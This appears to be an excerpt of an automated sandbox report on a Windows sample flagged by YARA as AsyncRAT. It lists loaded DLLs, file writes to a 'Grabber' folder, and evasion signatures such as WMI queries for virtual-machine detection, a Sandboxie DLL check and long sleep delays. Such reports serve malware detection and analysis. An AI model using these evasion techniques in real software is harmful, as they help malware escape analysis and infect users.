                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile written: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
                              Source: vYz1Z2heor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: vYz1Z2heor.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                              Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_05180538 push eax; ret 0_2_05180545
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_0518EC58 push esp; iretd 0_2_0518EC59
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeCode function: 0_2_05181790 push eax; iretd 0_2_0518179D

                              Boot Survival

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: vYz1Z2heor.exeBinary or memory string: SBIEDLL.DLL
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599891Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599782Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599657Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599532Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599407Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599282Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599172Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599063Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598938Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598813Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598688Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598563Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598453Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598344Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598219Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598110Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597985Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597735Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597610Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597485Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597360Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597235Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597110Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596985Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596735Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596610Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 596480Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594969Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594750Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594641Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594516Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594391Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 594281Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWindow / User API: threadDelayed 1489Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWindow / User API: threadDelayed 8331Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599891s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599782s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599657s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599532s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599407s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599282s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599172s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -599063s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598938s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598813s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598688s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598563s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598453s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598344s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -598110s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597985s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597860s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597735s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597610s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597485s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597360s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597235s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -597110s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -596985s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -596860s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -596735s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -596610s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -596480s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -100000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99765s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99656s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99432s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99327s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -99094s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -98984s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -98875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -98754s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -98640s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594969s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594860s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594750s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594641s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594516s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594391s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exe TID: 6460Thread sleep time: -594281s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599891Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599782Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599657Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599532Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599407Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599282Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599172Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 599063Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598938Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598813Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598688Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598563Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598453Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598344Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598219Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 598110Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597985Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597860Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597735Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597610Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597485Jump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeThread delayed: delay time: 597360Jump to behavior
